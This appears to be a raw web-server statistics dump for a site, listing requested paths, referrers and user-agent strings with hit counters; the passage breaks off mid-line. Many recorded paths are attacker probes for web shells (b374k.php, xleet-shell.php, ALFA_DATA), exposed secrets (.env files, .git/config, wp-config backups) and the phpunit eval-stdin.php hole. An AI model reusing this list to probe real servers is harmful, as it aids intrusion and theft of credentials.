1 0 0 0 1 0 0 29375823 0 0 29375823 0 /sosu.php 1 0 0 0 19 0 0 29416384 0 0 29293088 0 /abcd.php 1 0 0 0 1 0 0 29309619 0 0 29309619 0 /good.php 1 0 0 0 2 0 0 29352601 0 0 29347367 0 /adminer.php 1 0 0 0 3 0 0 29408500 0 0 29333630 0 /000.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /nax.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /.well-known/info.php 1 0 0 0 7 0 0 29416384 0 0 29293088 0 /new4.php 1 0 0 0 5 0 0 29289528 0 0 29282790 0 /web/.env 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-content/themes/seotheme/mar.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /webdb.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.hsenv 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test_info.php 1 0 0 0 3 0 0 29375335 0 0 29026983 0 /favicon.ico?46.101.225.202 1 0 0 0 2 0 0 29373838 0 0 29370906 0 /--.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /4yps5d.php 1 0 0 0 4 0 0 29387855 0 0 29337748 0 /dev.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /CmKHK.php 1 0 0 0 3 0 0 29408500 0 0 29345118 0 /wpls.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /underground_shell.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /foyhd.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /icon.php 1 0 0 0 5 0 0 29408500 0 0 29333629 0 /v3.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /pi.php 1 0 0 0 2 0 0 29278602 0 0 29211740 0 /wp-content/themes/twentytwentythree/patterns/index.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-content/product.php 1 0 0 0 2 0 0 29387855 0 0 29309619 0 /tcp.php 1 0 0 0 18 0 0 29375408 0 0 29024062 0 /website/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /conf/.env 1 0 0 0 4 0 0 29378026 0 0 29333397 0 /nfile.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /.well-known/ws.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-content/upgrade/about.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /async.php 1 0 0 0 13 0 0 29408500 0 0 29345118 0 /file15.php 1 0 0 0 2 0 0 29408500 0 0 29333629 0 /mds.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /static/js/main.141b0494.js 1 0 0 0 11 0 0 29416384 0 0 29365340 0 /classwithtostring.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /testmail.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /wp-signup.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.save.2 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /witm.php 1 0 0 0 2 0 0 29181393 0 0 29181358 0 /.ftpconfig 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /volka.php 1 0 0 0 9 0 0 29373838 0 0 29333397 0 /plss3.php 1 0 0 0 1 0 0 29348829 0 0 29348829 0 /.well-known/security.txt?46.101.225.202 1 0 0 0 3 0 0 29416384 0 0 29211742 0 /wp-includes/images/wp-login.php 1 0 0 0 1 0 0 29248628 0 0 29248628 0 /wordpress/?165.232.149.232 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /011i.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /ovka.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /env.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /y.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /autoload_classmap.php?p= 1 0 0 0 1 0 0 29181364 0 0 29181364 0 /config/configuration.yml 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /scx.php7 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /xojryvch.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /env.json 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /karma.conf.json 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /apps 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /lptlo.php 1 0 0 0 1 0 0 29370907 0 0 29370907 0 /zoz.php 1 0 0 0 2 0 0 29153337 0 0 29126052 0 /admin/filemanager/dialog.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /catalog/index.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /swagger/ 1 0 0 0 2 0 0 29374986 0 0 29272323 0 /.git/packed-refs 1 0 0 0 3 0 0 29381386 0 0 29337748 0 /124.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /hack.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /tumn.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /api/login 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /qa/.env.local 1 0 0 0 17 0 0 29416384 0 0 29211738 0 /about.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /asu.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /shell.shtml 1 0 0 0 2 0 0 29398488 0 0 29373838 0 /fh26.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /ff2.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/includes/plugin-install.php 1 0 0 0 1 0 0 29210008 0 0 29210008 0 /inputs.php?165.232.149.232 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /az.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/yourfile.php 1 0 0 0 2 0 0 29375823 0 0 29375823 0 /inzrw.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /itil.php 1 0 0 0 4 0 0 29378026 0 0 29293088 0 /dfre.php 1 0 0 0 27 0 0 29374986 0 0 28845585 0 /.git/config 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /envrc 1 0 0 0 2 0 0 29272325 0 0 29267994 0 /.env.live 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /.svn 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config/environment.json 1 0 0 0 2 0 0 29333397 0 0 29278603 0 /t.php 1 0 0 0 4 0 0 29373838 0 0 29365340 0 /hq.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /phpbb/phpinfo.php 1 0 0 0 20 0 0 29401288 0 0 29024062 0 /blog/wp-includes/wlwmanifest.xml 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /vendor/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /app/settings.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /fuck.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /sko.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-includes/functions.php 1 1 0 0 0 29285162 0 0 29285162 0 0 64 /.well-known/acme-challenge/8TUMPB8OXINENG-RQQIYRZ_4L2TJJLKQ 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-admin/network/plugins.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test_phpinfo2. 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /api/shared/config/.env 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /ALFA_DATA/index.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /bitch.php 1 0 0 0 2 0 0 29408500 0 0 29368527 0 /cc.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /Fox.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /baxa1.phP8 1 0 0 0 7 0 0 29398488 0 0 29345118 0 /thxt.php 1 0 0 0 3 0 0 29408500 0 0 29278603 0 /o.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /credits.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /hidden_access.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.docker/laravel/app/.env 1 0 0 0 1 0 0 29328695 0 0 29328695 0 /.well-known/security.txt 1 0 0 0 5 0 0 29355503 0 0 29353290 0 /app/ 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /shell_access.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /miansha.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /buy.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /debug.php 1 0 0 0 1 0 0 29211741 0 0 29211741 0 /wp-admin/user/wp-login.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /app/config.php 1 0 0 0 2 0 0 29250913 0 0 29250912 0 /akcc.php?copy=akcc.php&p= 1 0 0 0 3 0 0 29373838 0 0 29346558 0 /thoms.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /b374k.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /s3.js 1 0 0 0 2 0 0 29368526 0 0 29333629 0 /nl.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.development.sample 1 0 0 0 6 0 0 29387855 0 0 29337748 0 /10.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /docker/app/.env 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /lfm.php 1 0 0 1 0 0 29250911 0 0 29250911 0 0 /akcc.php?p=.well-known/acme-challenge 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /.git/logs/refs/heads/master 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /private/.env 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /info.php.back 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /wp-admin/network/wp-conflg.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.venv 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /9v6.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /platform/.env 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /static/js/main.e85f7a37.js 1 0 0 0 1 0 0 29181375 0 0 29181375 0 /sites/default/settings.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /wff.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /mtrje.php 1 1 0 0 0 29284982 0 0 29284982 0 0 64 /.well-known/acme-challenge/6RRVDLLTID_LKZOENNX_HW7CDYRUYIX5 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /xtt.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /mans.php 1 0 0 0 7 0 0 29373003 0 0 28845585 0 /login.action 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /unzip.php 1 0 0 0 6 0 0 29373003 0 0 29261510 0 /error_log 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /lsd.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /uploads/autoload_classmap.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /wozxsh.php 1 1 0 0 0 29120884 0 0 29120884 0 0 2321 /_autoindex/assets/js/tablesort.js?164.90.228.79 1 1 0 0 0 29144318 0 0 29144318 0 0 322 /_autoindex/assets/js/tablesort.number.js?164.90.228.79 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /j.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /.well-known/acme-challenge/myip.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /hg.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /back-end/app/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.docker.dev 1 423 423 0 27 29406443 0 29294501 28845585 0 28851879 340651 / 1 0 0 0 3 0 0 29385065 0 0 29383755 0 /lites.php 1 0 0 0 1 0 0 29374986 0 0 29374986 0 /.git/objects/info/packs 1 0 0 0 3 0 0 29398488 0 0 29370907 0 /.well-known/gecko-litespeed.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /04.php 1 0 0 0 2 0 0 29153336 0 0 29126052 0 /assets/kcfinder/upload.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /environment.ts 1 0 0 0 3 0 0 29372535 0 0 29358295 0 /xleet.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /ups.php 1 0 0 0 3 0 0 29385065 0 0 29383755 0 /classwithtostring.php?p= 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /reyna.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /a5.php 1 0 0 0 4 0 0 29408500 0 0 29293088 0 /file5.php 1 0 0 0 14 0 0 29398488 0 0 29333397 0 /yellow.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /.env.testing 1 0 0 0 2 0 0 29372535 0 0 29372535 0 /options-reading.php 1 0 0 0 10 0 0 29385065 0 0 29356079 0 /aaa.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /af4.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /metronic/assets/global/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /articles.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.dev.local 1 0 0 0 15 0 0 29373515 0 0 29024062 0 /2018/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29386605 0 0 29278602 0 /e.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /prod/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /app/etc/env.local.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /ww4.php 1 0 0 1 0 0 29250912 0 0 29250912 0 0 /akcc.php?copy=cgi-bin&finish=1&p= 1 0 0 0 4 0 0 29373838 0 0 29365340 0 /mail.php? 1 0 0 0 1 0 0 29358295 0 0 29358295 0 /xleet-shell.php?46.101.225.202 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /phpinfo2.php 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /node_modules/.git/config 1 0 0 0 5 0 0 29386605 0 0 29333397 0 /rrr.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /xpas2.php 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://account.imators.com/?ND 3 9 9 0 252 29289528 0 29289528 29159531 0 29285802 5496 https://www.google.com/ 3 38 0 0 29 29176024 0 29405667 28845665 0 28861061 41816 http://account.imators.com/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://account.imators.com/?SD 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://account.imators.com/?NA 3 0 0 0 1 0 0 29405694 0 0 29405694 0 http://www.account.imators.com/cgi-bin 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://account.imators.com/?SA 3 0 0 0 2 0 0 29211738 0 0 29211738 0 www.google.comhttps://t.me/optimasprimetools 3 4 0 0 0 29176025 0 0 29176024 0 0 4373 http://account.imators.com/?MD 3 1 1 0 0 29152582 0 0 29152582 0 0 616 https://www.google.it/ 3 1 1 0 5 29265800 0 29265800 29265800 0 29265800 1263 https://www.accelerategreatschools.org//wp-login.php 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://account.imators.com/?MA 3 82 0 0 60 29373004 0 29406443 28845585 0 28848470 91265 http://www.account.imators.com/ 4 0 0 0 3 0 0 29368457 0 0 29368457 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 4 4 0 4 28864731 0 28864731 28861851 0 28861851 2464 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 4 4 4 0 2 28845977 0 29357187 28845977 0 28845977 5064 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 4 1 1 0 1 28900278 0 28900278 28900278 0 28900278 612 Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9) 4 0 0 0 9 0 0 29372535 0 0 29357590 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 4 2 2 0 63 29289528 0 29289528 29289527 0 29289527 1220 Mozilla/5.0 (Windows; U; MSIE 6.1; Macintosh; .NET CLR 3.1.29701; Intel Mac OS X 10_4_0) 4 0 0 0 1 0 0 29353653 0 0 29353653 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 4 1 1 0 1 29021325 0 29021325 29021325 0 29021325 616 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0 4 59 19 17 47 29250912 29250912 29250913 29250910 29250910 29250910 438747 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) 4 0 0 0 1 0 0 29361164 0 0 29361164 0 Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 4 4 4 0 38 29401288 0 29401288 29144973 0 29145055 2508 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 4 4 4 0 0 29153338 0 0 29126052 0 0 2524 curl/7.88.1 4 0 0 0 200 0 0 29278604 0 0 29211738 0 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force 4 1 1 0 0 29116906 0 0 29116906 0 0 616 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 4 1 1 0 0 29373951 0 0 29373951 0 0 681 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 4 0 0 0 31 0 0 29277842 0 0 29211738 0 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 4 41 9 0 0 29391336 0 0 28845585 0 0 40303 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 1 1 0 1 29342507 0 29342507 29342507 0 29342507 681 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 4 10 10 0 11 29175880 0 28882316 28848470 0 28848470 6148 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29116330 0 0 29116330 0 Python-urllib/2.5 4 1 1 0 0 29382358 0 0 29382358 0 0 314 Mozilla/5.0 (iPhone; CPU iPhone OS 26_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0.1 Mobile/15E148 Safari/604.1 4 2 2 0 63 29285944 0 29285944 29285944 0 29285944 1220 Mozilla/5.0 (Linux x86_64; X11) Gecko/20032612 Firefox/13.0 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 4 17 17 0 0 29375352 0 0 29198571 0 0 10739 Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com) 4 0 0 0 1 0 0 29210008 0 0 29210008 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 4 0 0 0 2 0 0 29275441 0 0 29274167 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 4 0 0 0 8 0 0 29176025 0 0 29176024 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 2 2 0 0 29273719 0 0 29273719 0 0 1263 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 4 0 0 0 1 0 0 29198403 0 0 29198403 0 Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1 4 0 0 0 35 0 0 29166470 0 0 28851879 0 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com 4 0 0 0 3 0 0 29370206 0 0 29370173 0 Mozilla/5.0 (compatible; S-Scanner/1.0) 4 15 3 0 0 29176024 0 0 29176024 0 0 14958 Mozilla/5.0 (Linux; Android 11; V2055A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36 4 0 0 0 1 0 0 29360577 0 0 29360577 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0 4 2 2 0 0 29190970 0 0 29190970 0 0 1224 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 4 1 1 0 0 29285705 0 0 29285705 0 0 610 Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 4 1 1 0 0 29370804 0 0 29370804 0 0 1371 Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 1 0 0 0 29203759 0 0 29203759 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 4 1 1 0 0 29198396 0 0 29198396 0 0 612 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0 4 2 1 0 0 29294371 0 0 29033429 0 0 938 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0 4 0 0 0 3 0 0 29171385 0 0 29171385 0 fasthttp 4 0 0 0 1 0 0 29288272 0 0 29288272 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 4 9 9 0 11 29285165 0 29245027 29164562 0 29164562 5510 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 4 1 1 0 0 29154246 0 0 29154246 0 0 616 Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 1 1 0 1 29328596 0 29371907 29328596 0 29371907 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 16 6 0 0 29391322 0 0 28845586 0 0 15685 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 4 47 47 0 271 29373514 0 29373515 29024062 0 29024062 60301 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28935749 0 0 28896692 0 Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 9 9 0 51 29375408 0 29375408 29288943 0 29288943 12015 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 4 1 1 0 0 29117762 0 0 29117762 0 0 612 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 4 12 12 0 0 29410417 0 0 28846724 0 0 7212 Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/) 4 34 0 0 0 29373003 0 0 28845583 0 0 2958 Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org) 4 1 1 0 0 28854031 0 0 28854031 0 0 616 Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36 4 1 1 0 0 29305288 0 0 29305288 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.62 4 1 1 0 0 29152582 0 0 29152582 0 0 616 Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14 4 8 3 0 0 29382353 0 0 28846470 0 0 7270 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 4 1 1 0 0 29268969 0 0 29268969 0 0 610 Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0 4 0 0 0 1 0 0 29287566 0 0 29287566 0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 4 11 3 0 0 28845700 0 0 28845658 0 0 10582 Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1 4 2 2 0 63 29285802 0 29285802 29285802 0 29285802 1220 Mozilla/5.0 (compatible; MSIE 6.0; Linux x86_64; .NET CLR 2.5.18020; X11) 4 1 1 0 0 29304617 0 0 29304617 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0 4 0 0 0 8 0 0 29176025 0 0 29176024 0 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 4 0 0 0 1 0 0 29373955 0 0 29373955 0 Python-urllib/3.10 4 12 4 0 0 28845700 0 0 28845658 0 0 11202 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582 4 0 0 0 6 0 0 29360582 0 0 29358295 0 Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29263273 0 0 29263273 0 Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 4 0 0 0 2 0 0 29363929 0 0 29352601 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 1 1 0 0 29171385 0 0 29171385 0 0 612 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 4 6 6 0 7 29243841 0 29243841 29164100 0 29164100 3672 Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0 4 0 0 0 1 0 0 29285165 0 0 29285165 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29347367 0 0 29347367 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 1 1 0 0 28933446 0 0 28933446 0 0 612 Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36 4 1 1 0 0 29021315 0 0 29021315 0 0 616 Mozilla/5.0 (compatible; archive.org_bot 